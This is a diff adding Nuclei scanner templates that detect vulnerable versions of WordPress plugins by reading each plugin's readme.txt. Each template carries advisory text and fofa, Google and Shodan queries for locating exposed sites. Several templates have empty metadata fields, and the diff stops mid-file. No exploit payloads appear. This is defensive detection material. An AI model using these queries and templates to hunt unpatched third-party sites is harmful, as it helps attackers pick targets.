+ +info: + name: > + Security & Malware scan by CleanTalk <= 2.145 - Authorization Bypass via Reverse DNS Spoofing to Unauthenticated SQL Injection + author: topscoder + severity: high + description: > + The Security & Malware scan by CleanTalk plugin for WordPress is vulnerable to unauthorized SQL Injection due to an authorization bypass via reverse DNS spoofing on the checkWithoutToken function in all versions up to, and including, 2.145, as well as insufficient input sanitization and validation. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2187311d-6651-4eca-806d-aa2ff9fae4e2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-10570 + metadata: + fofa-query: "wp-content/plugins/security-malware-firewall/" + google-query: inurl:"/wp-content/plugins/security-malware-firewall/" + shodan-query: 'vuln:CVE-2024-10570' + tags: cve,wordpress,wp-plugin,security-malware-firewall,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/security-malware-firewall/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "security-malware-firewall" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.145') \ No newline at end of file diff --git a/poc/sql/CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9.yaml b/poc/sql/CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9.yaml new file mode 100644 index 0000000000..285f4876ec --- /dev/null +++ b/poc/sql/CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9 + +info: + name: > + BNE Gallery Extended <= 1.2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via gallery Shortcode + author: topscoder + severity: low + description: > + The BNE Gallery Extended plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gallery' shortcode in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1f9277d8-ac81-4950-a1e5-4e6c6b042f84?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11119 + metadata: + fofa-query: "wp-content/plugins/bne-gallery-extended/" + google-query: inurl:"/wp-content/plugins/bne-gallery-extended/" + shodan-query: 'vuln:CVE-2024-11119' + tags: cve,wordpress,wp-plugin,bne-gallery-extended,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bne-gallery-extended/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bne-gallery-extended" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/sql/CVE-2024-11202-7e66c6243adb4eea85c26f32e6f8ebab.yaml b/poc/sql/CVE-2024-11202-7e66c6243adb4eea85c26f32e6f8ebab.yaml new file mode 100644 index 0000000000..ea5f97b40d --- /dev/null +++ b/poc/sql/CVE-2024-11202-7e66c6243adb4eea85c26f32e6f8ebab.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11202-7e66c6243adb4eea85c26f32e6f8ebab + +info: + name: > + Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode + author: topscoder + severity: medium + description: > + Multiple plugins for WordPress are vulnerable to Reflected Cross-Site Scripting via the cminds_free_guide shortcode in various versions due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11202 + metadata: + fofa-query: "wp-content/plugins/cm-business-directory/" + google-query: inurl:"/wp-content/plugins/cm-business-directory/" + shodan-query: 'vuln:CVE-2024-11202' + tags: cve,wordpress,wp-plugin,cm-business-directory,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cm-business-directory/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cm-business-directory" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.1') \ No newline at end of file diff --git a/poc/sql/CVE-2024-11202-fff8c296c72f5db38be0e5405c2da320.yaml b/poc/sql/CVE-2024-11202-fff8c296c72f5db38be0e5405c2da320.yaml new file mode 100644 index 0000000000..0bd5c16918 --- /dev/null +++ b/poc/sql/CVE-2024-11202-fff8c296c72f5db38be0e5405c2da320.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11202-fff8c296c72f5db38be0e5405c2da320 + +info: + name: > + Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode + author: topscoder + severity: medium + description: > + Multiple plugins for WordPress are vulnerable to Reflected Cross-Site Scripting via the cminds_free_guide shortcode in various versions due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11202 + metadata: + fofa-query: "wp-content/plugins/cm-header-footer-script-loader/" + google-query: inurl:"/wp-content/plugins/cm-header-footer-script-loader/" + shodan-query: 'vuln:CVE-2024-11202' + tags: cve,wordpress,wp-plugin,cm-header-footer-script-loader,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cm-header-footer-script-loader/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cm-header-footer-script-loader" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/sql/CVE-2024-11225-d04b85edb3b4b1503b77188d5240c512.yaml b/poc/sql/CVE-2024-11225-d04b85edb3b4b1503b77188d5240c512.yaml new file mode 100644 index 0000000000..59c5e3bdd8 --- /dev/null +++ b/poc/sql/CVE-2024-11225-d04b85edb3b4b1503b77188d5240c512.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11225-d04b85edb3b4b1503b77188d5240c512 + +info: + name: > + Premium Packages – Sell Digital Products Securely <= 5.9.3 - Reflected Cross-Site Scripting via add_query_arg + author: topscoder + severity: medium + description: > + The Premium Packages – Sell Digital Products Securely plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.9.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a2e847fd-0932-4d65-a201-b86e39a33588?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11225 + metadata: + fofa-query: "wp-content/plugins/wpdm-premium-packages/" + google-query: inurl:"/wp-content/plugins/wpdm-premium-packages/" + shodan-query: 'vuln:CVE-2024-11225' + tags: cve,wordpress,wp-plugin,wpdm-premium-packages,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpdm-premium-packages/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpdm-premium-packages" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.9.3') \ No newline at end of file diff --git a/poc/sql/CVE-2024-22137-9ccea012e0ac1d68360d1db53ebe0f41.yaml b/poc/sql/CVE-2024-22137-9ccea012e0ac1d68360d1db53ebe0f41.yaml new file mode 100644 index 0000000000..9ee712546d --- /dev/null +++ b/poc/sql/CVE-2024-22137-9ccea012e0ac1d68360d1db53ebe0f41.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-22137-9ccea012e0ac1d68360d1db53ebe0f41 + +info: + name: > + Constant Contact Forms by MailMunch <= 2.0.11 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Constant Contact Forms by MailMunch plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an unknown parameter in versions up to, and including, 2.0.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a84bd9c8-97bd-4572-8bfa-5191d98c9523?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-22137 + metadata: + fofa-query: "wp-content/plugins/constant-contact-forms-by-mailmunch/" + google-query: inurl:"/wp-content/plugins/constant-contact-forms-by-mailmunch/" + shodan-query: 'vuln:CVE-2024-22137' + tags: cve,wordpress,wp-plugin,constant-contact-forms-by-mailmunch,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/constant-contact-forms-by-mailmunch/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "constant-contact-forms-by-mailmunch" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.11') \ No newline at end of file diff --git a/poc/sql/CVE-2024-47639-19456cd5cae51d9dbada09d8ad8ba38f.yaml b/poc/sql/CVE-2024-47639-19456cd5cae51d9dbada09d8ad8ba38f.yaml new file mode 100644 index 0000000000..ee9b2848a9 --- /dev/null +++ b/poc/sql/CVE-2024-47639-19456cd5cae51d9dbada09d8ad8ba38f.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-47639-19456cd5cae51d9dbada09d8ad8ba38f + +info: + name: > + VdoCipher <= 1.29 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The VdoCipher plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.29 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ae7fa018-c87f-463b-84a3-bbe71b73d3dd?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-47639 + metadata: + fofa-query: "wp-content/plugins/vdocipher/" + google-query: inurl:"/wp-content/plugins/vdocipher/" + shodan-query: 'vuln:CVE-2024-47639' + tags: cve,wordpress,wp-plugin,vdocipher,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/vdocipher/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "vdocipher" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.29') \ No newline at end of file diff --git a/poc/sql/CVE-2024-9307-99143edb3a824cd072b593997866abef.yaml b/poc/sql/CVE-2024-9307-99143edb3a824cd072b593997866abef.yaml new file mode 100644 index 0000000000..100cc6f1bb --- /dev/null +++ b/poc/sql/CVE-2024-9307-99143edb3a824cd072b593997866abef.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9307-99143edb3a824cd072b593997866abef + +info: + name: > + mFolio Lite <= 1.2.1 - Missing Authorization to Authenticated (Author+) File Upload via EXE and SVG Files + author: topscoder + severity: low + description: > + The mFolio Lite plugin for WordPress is vulnerable to file uploads due to a missing capability check in all versions up to, and including, 1.2.1. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file or upload arbitrary EXE files on the affected site's server which may make remote code execution possible if the attacker can also gain access to run the .exe file, or trick a site visitor into downloading and running the .exe file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3b4012dd-7c0a-45f1-8ada-8f9dc6867e1e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.9 + cve-id: CVE-2024-9307 + metadata: + fofa-query: "wp-content/plugins/mfolio-lite/" + google-query: inurl:"/wp-content/plugins/mfolio-lite/" + shodan-query: 'vuln:CVE-2024-9307' + tags: cve,wordpress,wp-plugin,mfolio-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mfolio-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mfolio-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/sql/bne-gallery-extended-3622d51c6b74dbf4cdd79a233382f3ca.yaml b/poc/sql/bne-gallery-extended-3622d51c6b74dbf4cdd79a233382f3ca.yaml new file mode 100644 index 0000000000..1d417657e1 --- /dev/null +++ b/poc/sql/bne-gallery-extended-3622d51c6b74dbf4cdd79a233382f3ca.yaml @@ -0,0 +1,59 @@ +id: bne-gallery-extended-3622d51c6b74dbf4cdd79a233382f3ca + +info: + name: > + BNE Gallery Extended <= 1.2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via gallery Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1f9277d8-ac81-4950-a1e5-4e6c6b042f84?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/bne-gallery-extended/" + google-query: inurl:"/wp-content/plugins/bne-gallery-extended/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,bne-gallery-extended,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bne-gallery-extended/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bne-gallery-extended" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/sql/cleantalk-spam-protect-372c8c9f4c2858edb68c8f1d9d6fa18e.yaml b/poc/sql/cleantalk-spam-protect-372c8c9f4c2858edb68c8f1d9d6fa18e.yaml new file mode 100644 index 0000000000..8a5f506d51 --- /dev/null +++ b/poc/sql/cleantalk-spam-protect-372c8c9f4c2858edb68c8f1d9d6fa18e.yaml @@ -0,0 +1,59 @@ +id: cleantalk-spam-protect-372c8c9f4c2858edb68c8f1d9d6fa18e + +info: + name: > + Spam protection, Anti-Spam, FireWall by CleanTalk <= 6.43.2 - Authorization Bypass via Reverse DNS Spoofing to Unauthenticated Arbitrary Plugin Installation + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d7eb5fad-bb62-4f0b-ad52-b16c3e442b62?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/cleantalk-spam-protect/" + google-query: inurl:"/wp-content/plugins/cleantalk-spam-protect/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,cleantalk-spam-protect,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cleantalk-spam-protect/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cleantalk-spam-protect" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.43.2') \ No newline at end of file diff --git a/poc/sql/cm-business-directory-341142a6bceeaabdbeb709723a8564c9.yaml b/poc/sql/cm-business-directory-341142a6bceeaabdbeb709723a8564c9.yaml new file mode 100644 index 0000000000..68243b5195 --- /dev/null +++ b/poc/sql/cm-business-directory-341142a6bceeaabdbeb709723a8564c9.yaml @@ -0,0 +1,59 @@ +id: cm-business-directory-341142a6bceeaabdbeb709723a8564c9 + +info: + name: > + Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/cm-business-directory/" + google-query: inurl:"/wp-content/plugins/cm-business-directory/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,cm-business-directory,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cm-business-directory/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cm-business-directory" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.1') \ No newline at end of file diff --git a/poc/sql/cm-email-blacklist-341142a6bceeaabdbeb709723a8564c9.yaml b/poc/sql/cm-email-blacklist-341142a6bceeaabdbeb709723a8564c9.yaml new file mode 100644 index 0000000000..9b08fa3b6f --- /dev/null +++ b/poc/sql/cm-email-blacklist-341142a6bceeaabdbeb709723a8564c9.yaml @@ -0,0 +1,59 @@ +id: cm-email-blacklist-341142a6bceeaabdbeb709723a8564c9 + +info: + name: > + Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/cm-email-blacklist/" + google-query: inurl:"/wp-content/plugins/cm-email-blacklist/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,cm-email-blacklist,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cm-email-blacklist/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cm-email-blacklist" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.3') \ No newline at end of file diff --git a/poc/sql/cm-header-footer-script-loader-341142a6bceeaabdbeb709723a8564c9.yaml b/poc/sql/cm-header-footer-script-loader-341142a6bceeaabdbeb709723a8564c9.yaml new file mode 100644 index 0000000000..a8cdba0344 --- /dev/null +++ b/poc/sql/cm-header-footer-script-loader-341142a6bceeaabdbeb709723a8564c9.yaml @@ -0,0 +1,59 @@ +id: cm-header-footer-script-loader-341142a6bceeaabdbeb709723a8564c9 + +info: + name: > + Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/cm-header-footer-script-loader/" + google-query: inurl:"/wp-content/plugins/cm-header-footer-script-loader/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,cm-header-footer-script-loader,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cm-header-footer-script-loader/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cm-header-footer-script-loader" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/sql/cm-on-demand-search-and-replace-341142a6bceeaabdbeb709723a8564c9.yaml b/poc/sql/cm-on-demand-search-and-replace-341142a6bceeaabdbeb709723a8564c9.yaml new file mode 100644 index 0000000000..6535040471 --- /dev/null +++ b/poc/sql/cm-on-demand-search-and-replace-341142a6bceeaabdbeb709723a8564c9.yaml @@ -0,0 +1,59 @@ +id: cm-on-demand-search-and-replace-341142a6bceeaabdbeb709723a8564c9 + +info: + name: > + Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/cm-on-demand-search-and-replace/" + google-query: inurl:"/wp-content/plugins/cm-on-demand-search-and-replace/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,cm-on-demand-search-and-replace,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cm-on-demand-search-and-replace/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cm-on-demand-search-and-replace" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.2') \ No newline at end of file diff --git a/poc/sql/cm-pop-up-banners-341142a6bceeaabdbeb709723a8564c9.yaml b/poc/sql/cm-pop-up-banners-341142a6bceeaabdbeb709723a8564c9.yaml new file mode 100644 index 0000000000..175f8cadb7 --- /dev/null +++ b/poc/sql/cm-pop-up-banners-341142a6bceeaabdbeb709723a8564c9.yaml @@ -0,0 +1,59 @@ +id: cm-pop-up-banners-341142a6bceeaabdbeb709723a8564c9 + +info: + name: > + Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/cm-pop-up-banners/" + google-query: inurl:"/wp-content/plugins/cm-pop-up-banners/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,cm-pop-up-banners,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cm-pop-up-banners/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cm-pop-up-banners" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.7.5') \ No newline at end of file diff --git a/poc/sql/cm-video-lesson-manager-341142a6bceeaabdbeb709723a8564c9.yaml b/poc/sql/cm-video-lesson-manager-341142a6bceeaabdbeb709723a8564c9.yaml new file mode 100644 index 0000000000..8d76e8c6c3 --- /dev/null +++ b/poc/sql/cm-video-lesson-manager-341142a6bceeaabdbeb709723a8564c9.yaml @@ -0,0 +1,59 @@ +id: cm-video-lesson-manager-341142a6bceeaabdbeb709723a8564c9 + +info: + name: > + Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/cm-video-lesson-manager/" + google-query: inurl:"/wp-content/plugins/cm-video-lesson-manager/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,cm-video-lesson-manager,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cm-video-lesson-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cm-video-lesson-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.2') \ No newline at end of file diff --git a/poc/sql/enhanced-tooltipglossary-341142a6bceeaabdbeb709723a8564c9.yaml b/poc/sql/enhanced-tooltipglossary-341142a6bceeaabdbeb709723a8564c9.yaml new file mode 100644 index 0000000000..8dfff41221 --- /dev/null +++ b/poc/sql/enhanced-tooltipglossary-341142a6bceeaabdbeb709723a8564c9.yaml @@ -0,0 +1,59 @@ +id: enhanced-tooltipglossary-341142a6bceeaabdbeb709723a8564c9 + +info: + name: > + Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/enhanced-tooltipglossary/" + google-query: inurl:"/wp-content/plugins/enhanced-tooltipglossary/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,enhanced-tooltipglossary,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "enhanced-tooltipglossary" + part: body + + - 